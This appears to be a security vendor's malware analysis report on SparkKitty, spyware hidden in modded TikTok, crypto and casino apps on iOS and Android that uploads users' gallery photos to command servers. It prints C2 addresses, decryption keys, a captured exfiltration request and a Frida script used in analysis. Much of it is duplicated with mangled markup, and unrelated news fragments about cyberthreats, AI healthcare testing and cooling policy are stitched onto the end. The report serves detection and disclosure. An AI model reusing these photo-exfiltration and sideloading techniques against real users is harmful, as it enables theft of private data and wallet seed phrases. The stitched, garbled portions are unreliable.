The malware targets both iOS and Android devices, and it is spreading in the wild as well as through the App Store and Google Play.
On iOS, the malicious payload is delivered as frameworks (primarily mimicking AFNetworking.framework or Alamofire.framework) or obfuscated libraries disguised as libswiftDarwin.dylib, or it can be embedded directly into the app itself.
The Android-specific Trojan comes in both Java and Kotlin flavors; the Kotlin version is a malicious Xposed module.
While most versions of this malware indiscriminately steal all images, we discovered a related malicious activity cluster that uses OCR to pick specific pictures.
The campaign has been active since at least February 2024.

It all began with a suspicious online store…

During routine monitoring of suspicious links, we stumbled upon several similar-looking pages that were distributing TikTok mods for Android. In these modified versions, the app’s main activities would trigger additional code. The code would then request a Base64-encoded configuration file from hxxps://moabc[.]vip/?dev=az. A sample decoded configuration file is shown below.

{ “links”: { “shopCenter”: “https://h1997.tiktokapp.club/wap/?”, “goodsList”: “https://h1997.tiktokapp.club/www/?”, “orderList”: “https://h1997.tiktokapp.club/www/?”, “reg”: “https://www.baidu.com”, “footbar”: “https://www.baidu.com” } }

{

“links”: {

“shopCenter”: “https://h1997.tiktokapp.club/wap/?”,

“goodsList”: “https://h1997.tiktokapp.club/www/?”,

“orderList”: “https://h1997.tiktokapp.club/www/?”,

“reg”: “https://www.baidu.com”,

“footbar”: “https://www.baidu.com”

}

The links from the configuration file were displayed as buttons within the app. Tapping these opened WebView, revealing an online store named TikToki Mall that accepted cryptocurrency as payment for consumer goods. Unfortunately, we couldn’t verify if it was a legitimate store, as users had to register with an invitation code to make a purchase.

Although we didn’t find any other suspicious functionality within the apps, a gut feeling told us to dig deeper. We decided to examine the code of the web pages distributing the apps, only to find a number of interesting details suggesting they might also be pushing iOS apps.

div class=“t-name”>

div class=“tit”>

i class=“iconfont icon-iphone” style=“font-size:inherit;margin-right:5px”>/i>

i class=“iconfont icon-android” style=“font-size:inherit;margin-right:5px”>/i>

iOS app delivery method

And sure enough, visiting the website on an iPhone triggers a series of redirects, ultimately landing the user on a page that crudely mimics the App Store and prompts them to download an app.

iOS app download page

As you know, iOS doesn’t just let you download and run any app from a third-party source. However, Apple provides members of the Apple Developer Program with so-called provisioning profiles. These allow a developer certificate to be installed on a user device. iOS then uses this certificate to verify the app’s digital signature and determine if it can be launched. Besides the certificate, a provisioning profile contains its expiration date and the permissions to be granted to the app, as well as other information about the developer and the app. Once the profile is installed on a device, the certificate becomes trusted, allowing the app to run.

Provisioning profiles come in several types. Development profiles are used for testing apps and can only be distributed to a predefined set of devices. App Store Connect profiles allow for publishing an app to the App Store. Enterprise profiles were created to allow organizations to develop internal-use apps and install them on their employees’ devices without publishing them on the App Store and without any restrictions on which devices they can be installed on. Although the Apple Developer Program requires a paid membership and developer verification by Apple, Enterprise profiles are often exploited. They are used not only by developers of apps unsuitable for the App Store (online casinos, cracks, cheats, or illegal mods of popular apps) but also by malware creators.

<?xml version="1.0" encoding="UTF-8"?><plist version="1.0"><dict> <key>AppIDName</key> <string>rdcUniApp</string> <key>ApplicationIdentifierPrefix</key> <array> <string>EHQ3N2D5WH</string> </array> <key>CreationDate</key> <date>2025-01-20T06:59:55Z</date> <key>Platform</key> <array> <string>iOS</string> <string>xrOS</string> <string>visionOS</string> </array> <key>IsXcodeManaged</key> <false></false> <key>DeveloperCertificates</key> <array> <data>OMITTED</data> </array></dict></plist>

DER-Encoded-Profile
OMITTED

Entitlements

application-identifier
EHQ3N2D5WH.com.ss-tpc.rd.rdcUniApp

keychain-access-groups

EHQ3N2D5WH.*
com.apple.token

get-task-allow

com.apple.developer.team-identifier
EHQ3N2D5WH

ExpirationDate
2026-01-20T06:59:55Z
Name
syf
ProvisionsAllDevices
TeamIdentifier

EHQ3N2D5WH

TeamName
SINOPEC SABIC Tianjin Petrochemical Co. Ltd.
TimeToLive
365
UUID
55b65f87-9102-4cb9-934a-342dd2be8e25
Version
1

xml version=“1.0” encoding=“UTF-8”?>

!DOCTYPE plist PUBLIC “-//Apple//DTD PLIST 1.0//EN” “http://www.apple.com/DTDs/PropertyList-1.0.dtd”>

plist version=“1.0”>

dict>

key>AppIDName/key>

string>rdcUniApp/string>

key>ApplicationIdentifierPrefix/key>

array>

string>EHQ3N2D5WH/string>

/array>

key>CreationDate/key>

date>2025–01–20T06:59:55Z/date>

key>Platform/key>

array>

string>iOS/string>

string>xrOS/string>

string>visionOS/string>

/array>

key>IsXcodeManaged/key>

false/>

key>DeveloperCertificates/key>

array>

data>OMITTED/data>

/array>

key>DER–Encoded–Profile/key>

data>OMITTED/data>

key>Entitlements/key>

dict>

key>application–identifier/key>

string>EHQ3N2D5WH.com.ss–tpc.rd.rdcUniApp/string>

key>keychain–access–groups/key>

array>

string>EHQ3N2D5WH.*/string>

string>com.apple.token/string>

/array>

key>get–task–allow/key>

false/>

key>com.apple.developer.team–identifier/key>

string>EHQ3N2D5WH/string>

/dict>

key>ExpirationDate/key>

date>2026–01–20T06:59:55Z/date>

key>Name/key>

string>syf/string>

key>ProvisionsAllDevices/key>

true/>

key>TeamIdentifier/key>

array>

string>EHQ3N2D5WH/string>

/array>

key>TeamName/key>

string>SINOPEC SABIC Tianjin Petrochemical Co. Ltd./string>

key>TimeToLive/key>

integer>365/integer>

key>UUID/key>

string>55b65f87–9102–4cb9–934a–342dd2be8e25/string>

key>Version/key>

integer>1/integer>

/dict>

/plist>

Example of a provisioning profile installed to run a malicious TikTok mod

In the case of the malicious TikTok mods, the attackers used an Enterprise profile, as indicated by the following key in its body:

<key>ProvisionsAllDevices</key> <true></true>

key>ProvisionsAllDevices/key>

true/>

It’s worth noting that installing any provisioning profile requires direct user interaction, which looks like this:

Profile installation flow

Looking for copper, found gold

Just like its Android counterpart, the installed iOS app contained a library that embedded links to a suspicious store within the user’s profile window. Tapping these opened them in WebView.

Suspicious store opened inside a TikTok app

It seemed like a straightforward case: another mod of a popular app trying to make some money. However, one strange detail in the iOS version caught our attention. On every launch, the app requested access to the user’s photo gallery – highly unusual behavior for the original TikTok. Furthermore, the library containing the store didn’t have code accessing the photo gallery, and the Android version never requested image permissions. We were compelled to dig a little deeper and examine the app’s other dependencies. This led to the discovery of a malicious module pretending to be AFNetworking.framework. For a touch of foreshadowing, let’s spotlight a curious detail: certain apps referred to it as Alamofire.framework, but the code itself stayed exactly the same. The original version of AFNetworking is an open-source library that provides developers with a set of interfaces for convenient network operations.

The malicious version differs from the original by a modified AFImageDownloader class and an added AFImageDownloaderTool class. Interestingly, the authors didn’t create separate initialization functions or alter the library’s exported symbols to launch the malicious payload. Instead, they took advantage of a feature in Objective-C that allows classes to define a special load selector, which is automatically called when the app is loading. In this case, the entry point for the malicious payload was the +[AFImageDownloader load] selector, which does not exist in the original framework.

Malicious class entry point

The malicious payload functions as follows:

It checks if the value of the ccool key in the app’s main Info.plist configuration file matches the string 77e1a4d360e17fdbc. If the two differ, the malicious payload will not proceed.
It retrieves the Base64-encoded value of the ccc key from the framework’s Info.plist file. This value is decoded and then decrypted using AES-256 in ECB mode with the key p0^tWut=pswHL-x>>:m?^.^)W padded with nulls to reach a length of 32 bytes. Some samples were also observed using the key J9^tMnt=ptfHL-x>>:m!^.^)A. If there’s no ccc key in the configuration or the key’s value is empty, the malware attempts to use the key com.tt.cf to retrieve an encrypted string from UserDefaults – a database where the app can store information for use in subsequent launches.
The decrypted value is a list of URLs from which the malware fetches additional payloads, encrypted using the same method. This new ciphertext contains a set of C2 addresses used for exfiltrating stolen photos.
The final step before uploading the photos is to receive authorization from the C2 server. To do this, the malware sends a GET request to the /api/getImageStatus endpoint, transmitting app details and the user’s UUID. The server responds with the following JSON:

{“msg”:”success”,”code”:0,”status”:”1″}

1

{“msg”:“success”,“code”:0,“status”:“1”}

The code field tells the app whether to repeat the request after a delay, with 0 meaning no, and the status field indicates whether it has permission to upload the photos.
Next, the malware requests access to the user’s photo gallery. It then registers a callback function to monitor for any changes within the gallery. The malware exfiltrates any accessible photos that have not already been uploaded. To keep track of which photos have been stolen, it creates a local database. If the gallery is modified while the app is running, the malware will attempt to access and upload the new images to the C2 server.

Photo exfiltration and upload

Data transmission is performed directly within the selector [AFImageDownloader receiptID:andPicID:] by making a PUT request to the /api/putImages endpoint. In addition to the image itself, information about the app and the device, along with unique user identifiers, is also sent to the server.

PUT /api/putImages HTTP/1.1 Host: 23.249.28.88:7777 Content-Type: multipart/form-data; boundary=Boundary+C9D8BE3781515E01 Connection: keep-alive Accept: */* User-Agent: TikTok/31.4.0 (iPhone; iOS 14.8; Scale/3.00) Accept-Language: en-US;q=1, ja-US;q=0.9, ar-US;q=0.8, ru-US;q=0.7 Content-Length: 80089 Accept-Encoding: gzip, deflate –Boundary+C9D8BE3781515E01 Content-Disposition: form-data; name=”appname” TikTok –Boundary+C9D8BE3781515E01 Content-Disposition: form-data; name=”buid” com.zhiliaoapp.musically –Boundary+C9D8BE3781515E01 Content-Disposition: form-data; name=”device” ios –Boundary+C9D8BE3781515E01 Content-Disposition: form-data; name=”userId” xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx –Boundary+C9D8BE3781515E01 Content-Disposition: form-data; name=”uuid” xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx/Lx/xxx –Boundary+C9D8BE3781515E01 Content-Disposition: form-data; name=”image”; filename=”<name>” Content-Type: image/jpeg ……JFIF…..H.H…..LExif..MM.*……………….i………&……………..e………. ……..8Photoshop 3.0.8BIM……..8BIM.%……………. …B~…4ICC_PROFILE……$appl….mntrRGB XYZ …….</name>

PUT /api/putImages HTTP/1.1

Host: 23.249.28.88:7777

Content–Type: multipart/form–data; boundary=Boundary+C9D8BE3781515E01

Connection: keep–alive

Accept: */*

User–Agent: TikTok/31.4.0 (iPhone; iOS 14.8; Scale/3.00)

Accept–Language: en–US;q=1, ja–US;q=0.9, ar–US;q=0.8, ru–US;q=0.7

Content–Length: 80089

Accept–Encoding: gzip, deflate

—Boundary+C9D8BE3781515E01

Content–Disposition: form–data; name=“appname”

TikTok

—Boundary+C9D8BE3781515E01

Content–Disposition: form–data; name=“buid”

com.zhiliaoapp.musically

—Boundary+C9D8BE3781515E01

Content–Disposition: form–data; name=“device”

ios

—Boundary+C9D8BE3781515E01

Content–Disposition: form–data; name=“userId”

xxxxxxxx–xxxx–xxxx–xxxx–xxxxxxxxxxxx

—Boundary+C9D8BE3781515E01

Content–Disposition: form–data; name=“uuid”

xxxxxxxx–xxxx–xxxx–xxxx–xxxxxxxxxxxx/Lx/xxx

—Boundary+C9D8BE3781515E01

Content–Disposition: form–data; name=“image”; filename=““

Content–Type: image/jpeg

......JFIF.....H.H.....LExif..MM.*...................i.........&.................e.......... ........8Photoshop 3.0.8BIM……..8BIM.%................ ...B~...4ICC_PROFILE……$appl....mntrRGB XYZ .......

Digging deeper

When we found a spyware component in the modified iOS version of TikTok, we immediately wondered if the Trojan had an Android counterpart. Our initial search led us to a bunch of cryptocurrency apps. These apps had malicious code embedded in their entry points. It requests a configuration file with C2 addresses and then decrypts it using AES-256 in ECB mode. These decrypted addresses are then used by the Trojan to send a GET request to /api/anheartbeat. The request includes information about the infected app. The Trojan expects a JSON response. If the code field is 0, it means communication with that C2 is allowed. The status flag in the JSON determines whether the Trojan can send the victim’s images to the server.

Checking C2 addresses

The main functionality of this malware – stealing images from the gallery – works in two stages. First, the malware checks the status flag. If it’s set to allow file uploads, the Trojan then checks the contents of a file named aray/cache/devices/.DEVICES on external storage. The first time it runs, the Trojan writes a hexadecimal number to this file. The number is an MD5 hash of a string containing the infected device’s IMEI, MAC address, and a random UUID. The content of this file is then compared to the string B0B5C3215E6D. If the content is different, the Trojan uploads images from the gallery, along with infected device info, to the command server via a PUT request to /api/putDataInfo. If the content is the same, it only uploads the third image from the end of an alphabetically sorted list. It’s highly likely the attackers use this specific functionality for debugging their malicious code.

Uploading image and device information

Later, we discovered other versions of this Trojan embedded in casino apps. These were loaded using the LSPosed framework, which is designed for app code hooking. Essentially, these Trojan versions acted as malicious Xposed modules. They would hook app entry points and execute code similar to the malware we described earlier, but with a few interesting twists:

The C2 address storage was located in both the module’s resources and directly within the malware code. Typically, these were two different addresses, and both were used to obtain C2 information.

Procedure for obtaining C2 addresses

Among the decrypted C2 addresses, the Trojan picks the one corresponding to the fastest server. It does this by sending a request to each server sequentially. If the request is successful, it records the response time. The shortest time then determines which C2 server is used. Note that this algorithm could have been implemented without needing to store intermediate values.

Finding the shortest response time

The code uses custom names for classes, methods, and fields.
It is written in Kotlin. Other versions we found were written in Java.

Spyware in official app stores

One of the Android Java apps containing a malicious payload was a messaging app with crypto exchange features. This app was uploaded to Google Play and installed over 10,000 times. It was still available in the store at the time of this research. We notified Google about it.

Infected app on Google Play

Another infected Android app we discovered is named 币coin and distributed through unofficial sources. However, it also has an iOS version. We found it on the App Store and alerted Apple to the presence of the infected app in their store.

Infected app page on the App Store

In both the Android and iOS versions, the malicious payload was part of the app itself, not of a third-party SDK or framework. In the iOS version, the central AppDelegate class, which manages the app’s lifecycle, registers its selector [AppDelegate requestSuccess:] as a handler for responses returned by requests sent to i.bicoin[.]com[.]cn.

Checking the server response and sending a photo

{ code = 0; data = { 27 = ( ); 50002 = ( { appVersion = “”; cTime = 1696304011000; id = 491; imgSubTitle = “”; imgTitle = “U70edU5f00U5173Uff08U65b0Uff09”; imgType = 50002; imgUrl = 0; imgUrlSub = “”; isFullScreen = 0; isNeed = 1; isSkip = 1; langType = all; operator = 0; skipUrl = “”; sort = 10000; source = 0; type = 0; uTime = <timestamp>; } ); }; dialog = { cancelAndClose = 0; cancelBtn = “”; cancelColor = “”; code = 0; confirmBtn = “”; confirmColor = “”; content = “”; contentColor = “”; time = “”; title = OK; titleColor = “”; type = 3; url = “”; };</timestamp>

{

code = 0;

data = {

27 = (

);

50002 = (

{

appVersion = “”;

cTime = 1696304011000;

id = 491;

imgSubTitle = “”;

imgTitle = “U70edU5f00U5173Uff08U65b0Uff09”;

imgType = 50002;

imgUrl = 0;

imgUrlSub = “”;

isFullScreen = 0;

isNeed = 1;

isSkip = 1;

langType = all;

operator = 0;

skipUrl = “”;

sort = 10000;

source = 0;

type = 0;

uTime = timestamp>;

}

);

};

dialog = {

cancelAndClose = 0;

cancelBtn = “”;

cancelColor = “”;

code = 0;

confirmBtn = “”;

confirmColor = “”;

content = “”;

contentColor = “”;

time = “”;

title = OK;

titleColor = “”;

type = 3;

url = “”;

};

Sample server response

In the response, the imgUrl field contains information about the permission to send photos (1 means granted). Once the Trojan gets the green light, it uses a similar method to what we described earlier: it downloads an encrypted set of C2 addresses and tries sending the images to one of them. By default, it’ll hit the first address on the list. If that one’s down, the malware just moves on to the next. The photo-sending functionality is implemented within the KYDeviceActionManager class.

Retrieving and sending photos

Suspicious libcrypto.dylib mod

During our investigation, we also stumbled upon samples that contained another suspicious library: a modified version of OpenSSL’s cryptographic primitives library, libcrypto.dylib. It showed up under names like wc.dylib and libswiftDarwin.dylib, had initialization functions that were obfuscated with LLVM, and contained a link to a configuration we’d seen before in other malicious frameworks. It also imported the PHPhotoLibrary class, used for gallery access in the files we mentioned earlier. Sometimes the library was delivered alongside the malicious AFNetworking.framework/Alamofire.framework, sometimes not.

Unlike other variants of this malware, this particular library didn’t actually reach out to the malicious configuration file link embedded within it. That meant we had to manually dig for the code responsible for its initial communication with the C2. Even though these library samples are heavily obfuscated, some of them, like the sample with the hash c5be3ae482d25c6537e08c888a742832, still had cross-references to the part of the code where the encrypted configuration page URL was used. This function converted a URL string into an NSString object.

Section of obfuscated code for loading the malicious URL

Using Frida, we can execute any piece of code as a function, but simply converting a string to an NSString object isn’t enough to confirm the library’s malicious intent. So, we followed the cross-references up several levels. When we tried to execute the function that worked with the URL during its execution, we discovered it was making a GET request to the malicious URL. However, we couldn’t get a response right away; the server the URL pointed to was already inactive. To make the function run correctly, we used Frida to substitute the link with a working one, where we knew exactly what data it returned and how it was decrypted. By setting logging hooks on the objc_msgSend call and running the malicious function with a swapped URL, we got the info we needed about the calls. Below is the Frida script we used to do this:

//print backtrace
console.log(bt.map(DebugSymbol.fromAddress).join(“n”));
}

},
onLeave: function(retval) {
if (exit_log == 1) {
console.warn(“n***extiting “, name);
console.log(this.context.x0.readByteArray(64));
}
}
});
}

var malInited = false;
var malFunc;
function callMalware() {
if (!malInited) {
malFunc = new NativeFunction(base.add(0x7A77CC), ‘void’, []);
traceModule(base.add(0x821360), ‘objc_msgSend’);
malInited = true;
}
malFunc();
}

var mname = “wc.dylib”;
var base = Process.enumerateModules().filter(x=>x.name.includes(mname))[0].base;
console.log(‘Base address: ‘, base);
malFunc();

function traceModule(impl, name)

{

console.log(“Tracing “ + name, impl);

var exit_log = 0;

Interceptor.attach(impl, {

onEnter: function(args) {

var bt = Thread.backtrace(this.context, Backtracer.ACCURATE);

if (!moduleMap) {

moduleMap = new ModuleMap();

}

var modules = bt.map(x => moduleMap.find(x)).filter(x => x != null).map(x => x.name);

// we want to trace only calls originating from malware dylib

if (modules.filter(x => x.includes(‘wc.dylib’)).length > 0) {

exit_log = 1;

console.warn(“n*** entering “ + name);

if(name.includes(‘objc_msgSend’)) {

var sel = this.context.x1.readUtf8String();

if (sel.includes(“stringWithCString:”)) {

var s = this.context.x2.readUtf8String();

if (s.includes(‘.cn-bj.ufileos.com’)) {

console.log(“Replacing URL: “, s);

var news = Memory.allocUtf8String(‘https://data-sdk2.oss-accelerate.aliyuncs.com/file/SGTMnH951121’);

this.context.x2 = news;

console.log(“New URL: “, this.context.x2.readUtf8String());

}

else

console.log(s);

}

//print backtrace

console.log(bt.map(DebugSymbol.fromAddress).join(“n”));

}

onLeave: function(retval) {

if (exit_log == 1) {

console.warn(“n***extiting “, name);

console.log(this.context.x0.readByteArray(64));

}

});

}

var malInited = false;

var malFunc;

function callMalware() {

if (!malInited) {

malFunc = new NativeFunction(base.add(0x7A77CC), ‘void’, []);

traceModule(base.add(0x821360), ‘objc_msgSend’);

malInited = true;

}

malFunc();

}

var mname = “wc.dylib”;

var base = Process.enumerateModules().filter(x=>x.name.includes(mname))[0].base;

console.log(‘Base address: ‘, base);

malFunc();

Our suspicions were confirmed: the malicious function indeed loads and decrypts the C2 address configuration from a given URL. It then uses this C2 for sending device data, following the same pattern we described earlier and using the same AES-256 key. Below is an excerpt from the function’s execution logs.

*** entering objc_msgSend ### Creating NSString object with decrypted string [ 0x20193a010 stringWithCString:”http://84.17.37.155:8081″ encoding: ] 0x102781be8 wc.dylib!0x7d1be8 (0x7d1be8) 0x1027590e8 wc.dylib!0x7a90e8 (0x7a90e8)

*** entering objc_msgSend
### Creating NSString with api endpoint decrypted somewhere in code
[ 0x20193a010 stringWithCString:”%@/api/getStatus?buid=%@&appname=%@&userId=%@” encoding: ]
0x10277cc50 wc.dylib!0x7ccc50 (0x7ccc50)
0x102783264 wc.dylib!0x7d3264 (0x7d3264)

### Here sample initiates HTTP request to decrypted C2 address and decrypts its response ###

*** entering objc_msgSend
### Getting server response as data object
[ 0x2022d5078 initWithData:encoding: ]
0x10277f4a4 wc.dylib!0x7cf4a4 (0x7cf4a4)
0x1afafcac4 CFNetwork!0x1dac4 (0x180a6cac4)

*** leaving objc_msgSend
### Server response in bytes

00000000 41 e9 92 01 a2 21 00 00 8c 07 00 00 01 00 00 00 A….!……….
00000010 2e 7b 22 6d 73 67 22 3a 22 73 75 63 63 65 73 73 .{“msg”:”success
00000020 22 2c 22 63 6f 64 65 22 3a 30 2c 22 75 73 22 3a “,”code”:0,”us”:
00000030 31 2c 22 73 74 61 74 75 73 22 3a 22 30 22 7d 00 1,”status”:”0″}.

*** entering objc_msgSend

### Creating NSString object with decrypted string

[ 0x20193a010 stringWithCString:“http://84.17.37.155:8081” encoding: ]

0x102781be8 wc.dylib!0x7d1be8 (0x7d1be8)

0x1027590e8 wc.dylib!0x7a90e8 (0x7a90e8)

*** entering objc_msgSend

### Creating NSString with api endpoint decrypted somewhere in code

[ 0x20193a010 stringWithCString:“%@/api/getStatus?buid=%@&appname=%@&userId=%@” encoding: ]

0x10277cc50 wc.dylib!0x7ccc50 (0x7ccc50)

0x102783264 wc.dylib!0x7d3264 (0x7d3264)

### Here sample initiates HTTP request to decrypted C2 address and decrypts its response ###

*** entering objc_msgSend

### Getting server response as data object

[ 0x2022d5078 initWithData:encoding: ]

0x10277f4a4 wc.dylib!0x7cf4a4 (0x7cf4a4)

0x1afafcac4 CFNetwork!0x1dac4 (0x180a6cac4)

*** leaving objc_msgSend

### Server response in bytes

00000000 41 e9 92 01 a2 21 00 00 8c 07 00 00 01 00 00 00 A....!..........

00000010 2e 7b 22 6d 73 67 22 3a 22 73 75 63 63 65 73 73 .{“msg”:“success

00000020 22 2c 22 63 6f 64 65 22 3a 30 2c 22 75 73 22 3a “,“code”:0,“us”:

00000030 31 2c 22 73 74 61 74 75 73 22 3a 22 30 22 7d 00 1,“status”:“0”}.

The function execution log above clearly shows it uses an IP address from the encrypted configuration file. Device data is sent to this IP’s /api/getStatus endpoint with arguments familiar from previous samples. We also see that the server’s response contains the code and status fields we’ve encountered before. All of this strongly suggests that this library is also involved in stealing user photos. The only thing we haven’t pinpointed yet is the exact conditions under which this malicious function activates. At startup, the library contacts a C2 whose address in encrypted within it, sending device information and expecting a JSON string response from the server. At the time of this research, we hadn’t found any samples with an active C2 address, so we don’t know the precise response it’s looking for. However, we assume that response – or subsequent responses – should contain the permission to start sending photos.

Another activity cluster?

During our research, we stumbled upon a significant number of pages offering for download various scam iOS apps in the PWA (progressive web app) format. At first glance, these pages seemed unrelated to the campaign we describe in this article. However, their code bore a striking resemblance to the pages distributing the malicious TikTok version, which prompted us to investigate how users were landing on them. While digging into the traffic sources, we uncovered ads for various scams and Ponzi schemes on popular platforms.

Scam platform account on YouTube

Some of these PWA-containing pages also included a section prompting users to download a mobile app. For Android users, the link downloaded an APK file that opened the scam platform via WebView.

App download links

Beyond just opening scam websites in WebView, these downloaded APKs had another function. The apps requested access to read storage. Once this was granted, they used the Loader API to register their content download event handler. This handler then selected all JPEG and PNG images. The images were processed using the Google ML Kit library designed for optical character recognition. ML Kit searched for text blocks and then broke them down into lines. If at least three lines containing a word with a minimum of three letters were found, the Trojan would send the image to the attackers’ server – its address was retrieved from Amazon AWS storage.

Code snippet for photo uploads

We’re moderately confident that this activity cluster is connected to the one described above. Here’s why:

The malicious apps also focus on cryptocurrency themes.
Similar tactics are employed: the C2 address is also hosted in cloud storage, and gallery content is exfiltrated.
The pages distributing iOS PWAs look similar to those used to download malicious TikTok mods.

Given this connection between the two activity clusters, we suspect the creators of the apps mentioned earlier might also be spreading them through social media ads.

Campaign goals and targets

Unlike SparkCat, the spyware we analyzed above doesn’t show direct signs of the attackers being interested in victims’ crypto assets. However, we still believe they’re stealing photos with that exact goal in mind. The following details lead us to these conclusions:

A crypto-only store was embedded within the TikTok app alongside the spyware.
Among the apps where the spyware was found, several were crypto-themed. For instance, 币coin in the App Store positions itself as a crypto information tracker, and the SOEX messaging app has various crypto-related features as well.
The main source for distributing the spyware is a network of cookie-cutter app download platforms. During our investigation, we found a significant number of domains that distributed both the described Trojan and PWAs (progressive web apps). Users were directed to these PWAs from various cryptocurrency scam and Ponzi scheme sites.

Our data suggests that the attackers primarily targeted users in Southeast Asia and China. Most of the infected apps we discovered were various Chinese gambling games, TikTok, and adult games. All these apps were originally aimed specifically at users in the regions mentioned above.
Furthermore, we believe this malware is linked to the SparkCat campaign, and here’s our reasoning:

Some Android apps infected with SparkKitty were built with the same framework as the apps infected with SparkCat.
In both campaigns, we found the same infected Android apps.
Within the malicious iOS frameworks, we found debug symbols. They included file paths from the attackers’ systems, which pointed to where their projects were being built. These paths match what we previously observed in SparkCat.

Takeaways

Threat actors are still actively compromising official app stores, and not just for Android – iOS is also a target. The espionage campaign we uncovered uses various distribution methods: it spreads through apps infected with malicious frameworks/SDKs from unofficial sources, as well as through malicious apps directly on the App Store and Google Play. While not technically or conceptually complex, this campaign has been ongoing since at least the beginning of 2024 and poses a significant threat to users. Unlike the previously discovered SparkCat spyware, this malware isn’t picky about which photos it steals from the gallery. Although we suspect the attackers’ main goal is to find screenshots of crypto wallet seed phrases, other sensitive data could also be present in the stolen images.

Judging by the distribution sources, this spyware primarily targets users in Southeast Asia and China. However, it doesn’t have any technical limitations that would prevent it from attacking users in other regions.

Our security products return the following verdicts when detecting malware associated with this campaign:

HEUR:Trojan-Spy.AndroidOS.SparkKitty.*
HEUR:Trojan-Spy.IphoneOS.SparkKitty.*

Indicators of compromise

Paths

/sdcard/aray/cache/devices/.DEVICES

MIL OSI Global Banks –

June 23, 2025

Category: AM-NC

Africa’s top cyberthreats

Law enforcement challenges

Strengthening cyber resilience

AI breakthroughs drive expansion of ‘Airlock’ testing programme to support AI-powered healthcare innovation

Science Minister, Lord Vallance, said:

Health Minister, Baroness Merron, said:

James Pound, MHRA Interim Executive Director, Innovation and Compliance, said:

Notes to editors

Share this page

Updates to this page

Develop an effective legislative framework for climate-friendly cooling.

Improve standards and labeling systems, and enhance compliance with efficiency standards.

Promote low-carbon cooling in public buildings.

Develop incentive policies to encourage behavior change.

Monitor and regulate refrigerants and cooling equipment from a life-cycle perspective

Finance large-scale deployment.

Take an integrated approach and encourage collective efforts.

Build capacity for low-carbon cooling.

It all began with a suspicious online store…

iOS app delivery method

Looking for copper, found gold

Digging deeper

Spyware in official app stores

Suspicious libcrypto.dylib mod

Another activity cluster?

Campaign goals and targets

Takeaways

Indicators of compromise

Infected Android apps

Infected iOS apps

Malicious iOS frameworks

Obfuscated malicious iOS libraries

Download links for infected apps

Pages distributing Trojans

C2 and configuration storage

Paths